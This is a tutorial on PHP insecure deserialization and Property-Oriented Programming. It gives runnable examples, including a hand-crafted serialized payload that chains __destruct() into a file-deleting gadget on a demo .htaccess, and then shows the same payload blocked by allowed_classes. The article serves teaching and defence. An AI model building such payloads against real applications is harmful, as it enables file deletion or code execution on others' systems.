Overview of the Deserialization attack method in PHP

Tram Ho

Process of Serialization and Deserialization of objects

  • Serialization is the process of converting the state of an object into a form that can be stored or transmitted. The result can be written to disk or sent over the network as bytes, XML, JSON, and so on.
  • Deserialization is the reverse: taking data in one of those structured forms (bytes, XML, JSON, etc.) and rebuilding the object from it.

Object Serialization Process:
  • In PHP, the function that serializes objects is serialize( ) . Its input is an object and its output is a string that represents that object: specifically, the object's class name and its properties (with their values).

  • Here, create a Student class with the properties $name and $age, the methods setName( ) , getName( ) , setAge( ) , getAge( ) , and the two magic methods __sleep( ) and __wakeup( ) . Then create a $student object and set its properties through setName( ) and setAge( ) .
  • The object before being serialized:

  • Next, call serialize( ) with the $student object as its argument. serialize( ) returns a string that represents the object; save it in $serializeStudent. The object after being serialized:

The process of object Deserialization

  • In PHP, the function that deserializes objects is unserialize( ) . Its input is a string representing an object; its output is the object rebuilt from that string.

  • Here, pass the $serializeStudent variable to unserialize( ) to rebuild the object and save the result in $deserializeStudent. The result:

  • The object obtained by deserializing $serializeStudent has the same class and property values as the object before it was serialized.
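The following is an added, runnable example (not code from the original article) that carries out the round trip described above: a Student class with the accessors and the __sleep( ) / __wakeup( ) magic methods, serialized and then rebuilt with unserialize( ). The sample name and age are constructed values; the expected output is given in the comments.

```php
<?php
// Added example: serialize()/unserialize() round trip of a Student object.
// Class shape follows the article's description; property values are made up.
class Student
{
    private $name;
    private $age;

    public function setName(string $name): void { $this->name = $name; }
    public function getName(): string { return $this->name; }
    public function setAge(int $age): void { $this->age = $age; }
    public function getAge(): int { return $this->age; }

    // Called by serialize(): returns the names of the properties to store.
    public function __sleep(): array
    {
        echo "__sleep() called\n";
        return ['name', 'age'];
    }

    // Called by unserialize() once the properties have been restored.
    // No constructor runs during unserialize(); this is the hook that does.
    public function __wakeup(): void
    {
        echo "__wakeup() called\n";
    }
}

$student = new Student();
$student->setName('Alice');   // constructed sample value
$student->setAge(20);         // constructed sample value

// Serialization: class name plus properties as a string.
$serializeStudent = serialize($student);
echo $serializeStudent, "\n";
// O:7:"Student":2:{s:13:"\0Student\0name";s:5:"Alice";s:12:"\0Student\0age";i:20;}
// Private properties are stored as "\0ClassName\0prop", hence the lengths 13 and 12.

// Deserialization: the string becomes a Student again, without calling the constructor.
$deserializeStudent = unserialize($serializeStudent);
var_dump($deserializeStudent instanceof Student);                          // bool(true)
echo $deserializeStudent->getName(), ' ', $deserializeStudent->getAge(), "\n"; // Alice 20
```

The point to notice is that everything unserialize( ) needs to rebuild the object is inside the string itself, including the class name and every property value. Whoever controls that string therefore controls what class is instantiated and what its properties hold, which is the root of the vulnerability discussed below.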

Introducing the Deserialization flaw

  • In the OWASP Top 10 2017, this vulnerability was ranked eighth: A8:2017 - Insecure Deserialization. An application is affected when it deserializes input without validating it first. Malformed or unexpected data can then change the application's control flow, which can result in denial of service or arbitrary code execution.
  • In PHP the deserialization vulnerability is also known as PHP Object Injection. Depending on the context, it lets an attacker carry out other attacks such as code injection, SQL injection, path traversal and denial of service. It occurs when input is passed to PHP's unserialize() without proper checks. Magic methods such as __wakeup() , __destruct() and __toString() , chained together into a POP chain, are what let the attacker exploit it.
  • In 2010, Stefan Esser gave a presentation at the Black Hat conference on the risks of PHP Object Injection, using WordPress, a platform built in PHP that relies on serialize() and unserialize() , as the example. Building on that work, in 2013 Tom Van Goethem, a PhD researcher in Belgium, found a PHP Object Injection vulnerability in WordPress 3.6.1. Also in 2013, the Joomla platform was found to have a similar vulnerability (CVE-2013-3242). In 2015, Johannes Dahse, a German PhD researcher, discovered a PHP Object Injection vulnerability in the PHP-based e-commerce software Magento 1.9.0.1. Since then, deserialization vulnerabilities allowing remote code execution (RCE) and remote control of the victim's machine have been reported in many web applications: in recent years roughly 60 deserialization vulnerabilities allowing remote code execution, and more than 80 deserialization vulnerabilities in total, have been reported. In 2017, OWASP placed deserialization eighth in its Top 10. These figures show both how dangerous and how widespread the vulnerability is on the PHP platform.

Property Oriented Programming Technique

  • Memory corruption vulnerabilities such as buffer overflows have long been known, and protections such as ASLR and DEP are widely deployed to make them harder to exploit. An attacker can, however, bypass these defenses with code reuse techniques: return-to-libc, Return-Oriented Programming (ROP) and Jump-Oriented Programming (JOP) defeat some of them. With ROP and JOP the attacker reuses pieces of code already present in the program (called gadgets ) and combines them into a payload (a gadget chain ).
  • In 2009 Esser showed that code reuse also applies to PHP applications: an attacker who can inject objects into a web application can set those objects' properties, and so alter the application's data and control flow. He coined the term Property-Oriented Programming ( POP ) for this.
  • Property-Oriented Programming ( POP ) means controlling the properties of objects in order to influence the execution flow of the program. A POP gadget is a piece of existing code, typically a method, whose behaviour depends on object properties the attacker controls. It is the high-level counterpart of ROP (a technique used in exploiting memory corruption): where a ROP gadget operates on values the attacker placed on the stack, a POP gadget operates on values the attacker placed in properties, and may for example write to or delete a file. As in any code reuse attack, the code that runs (the gadget ) already exists in the application; it is only steered into performing an unwanted action such as executing arbitrary system commands. Because deserialization sets properties to whatever values the attacker chose, one gadget can be made to call a second one: methods are often invoked on objects that are themselves stored in properties. Gadgets linked together in this way form a gadget chain .
  • An important point is that exploiting a deserialization vulnerability does not mean sending code to the program for execution. The attacker only sends property values for classes the server already has, and the server's own existing code then operates on those values. Two conditions must hold for a successful exploit:
    1. An entry point: a place where the attacker's serialized data reaches the target and the target deserializes it.
    2. Gadgets: one or more pieces of existing code whose behaviour the attacker can steer through the deserialized properties.
  • Concretely, a PHP application must meet two prerequisites for POP to turn a PHP Object Injection vulnerability into an exploit. First, the class of the object the attacker injects must implement a magic method (such as __wakeup() or __destruct() ) that is invoked automatically while the application runs. Second, that class must be loaded (declared or autoloadable) within the scope of the unserialize() call, and the attacker must control the input to unserialize() .
  • In the scenario below, three gadgets are combined into an arbitrary file deletion exploit.

  • The PHP Object Injection vulnerability is on line 19 of the listing, where user input is passed to unserialize() . On lines 20 and 21 the attacker injects a Database object whose handle property is set to an object of the TempFile class, with the filename property set to ../../.htaccess .
  • When the script finishes, the injected Database object is destroyed and its __destruct() method runs automatically. Because the handle property holds a TempFile object, __destruct() calls the shutdown() method defined in the File class, and shutdown() calls close() , which TempFile overrides. TempFile's close() deletes the file named by filename , so the attacker's ../../.htaccess is deleted.
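The article's listing is not reproduced on this page, so the following is an added reconstruction of the three-gadget chain from the description above; it is not the original code. The class and method names ( Database , File , TempFile , shutdown() , close() ) follow the text, while the method bodies, the public properties and the temporary target file that stands in for ../../.htaccess are assumptions made for this example. The second half shows the same payload against a sink hardened with the allowed_classes option of unserialize() (available since PHP 7.0), which is the check a practitioner would want next to the vulnerable one.

```php
<?php
// Added example: reconstruction of the Database -> File -> TempFile gadget chain.
// Bodies and property visibility are assumed; only the chain shape comes from the text.

class File
{
    public $filename;

    public function close(): void
    {
        // Base class: nothing to clean up.
    }

    // Gadget 2: shutdown() calls close(), which a subclass may override.
    public function shutdown(): void
    {
        $this->close();
    }
}

class TempFile extends File
{
    // Gadget 3: a temporary file removes itself when closed.
    public function close(): void
    {
        if ($this->filename !== null && file_exists($this->filename)) {
            unlink($this->filename);
        }
    }
}

class Database
{
    public $handle;

    // Gadget 1 (entry gadget): runs automatically when the object is destroyed.
    public function __destruct()
    {
        if ($this->handle !== null) {
            $this->handle->shutdown();
        }
    }
}

// A file in a temporary directory stands in for the article's ../../.htaccess.
$dir    = sys_get_temp_dir() . '/poi_demo_' . getmypid();
$target = $dir . '/.htaccess';
mkdir($dir);
file_put_contents($target, "Deny from all\n");

// The attacker's payload, hand-crafted as the serialized form of a Database whose
// handle is a TempFile pointing at the target. (Building it with serialize() on real
// objects would itself fire __destruct() and delete the file.)
$payload = sprintf(
    'O:8:"Database":1:{s:6:"handle";O:8:"TempFile":1:{s:8:"filename";s:%d:"%s";}}',
    strlen($target), $target
);

echo "before:            ", var_export(file_exists($target), true), "\n"; // true

// Vulnerable sink (the article's line 19): untrusted input straight into unserialize().
$obj = unserialize($payload);
// Dropping the last reference fires Database::__destruct() -> File::shutdown()
// -> TempFile::close() -> unlink(). Script exit would do the same.
unset($obj);

echo "after (vulnerable): ", var_export(file_exists($target), true), "\n"; // false

// Hardened sink: refuse to instantiate any class, so no magic method can run.
file_put_contents($target, "Deny from all\n");
$safe = unserialize($payload, ['allowed_classes' => false]);
echo get_class($safe), "\n";                                                // __PHP_Incomplete_Class
unset($safe);
echo "after (hardened):   ", var_export(file_exists($target), true), "\n"; // true

unlink($target);
rmdir($dir);
```

Two things are worth noting. The payload contains no code at all, only class names and property values; every line that actually deletes the file is application code that was already there. And allowed_classes => false stops this chain because __PHP_Incomplete_Class has no destructor; an allow-list of specific classes is the equivalent when the application really must deserialize objects, but any class on the list is again a potential gadget.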

To be continued …


Source : Viblo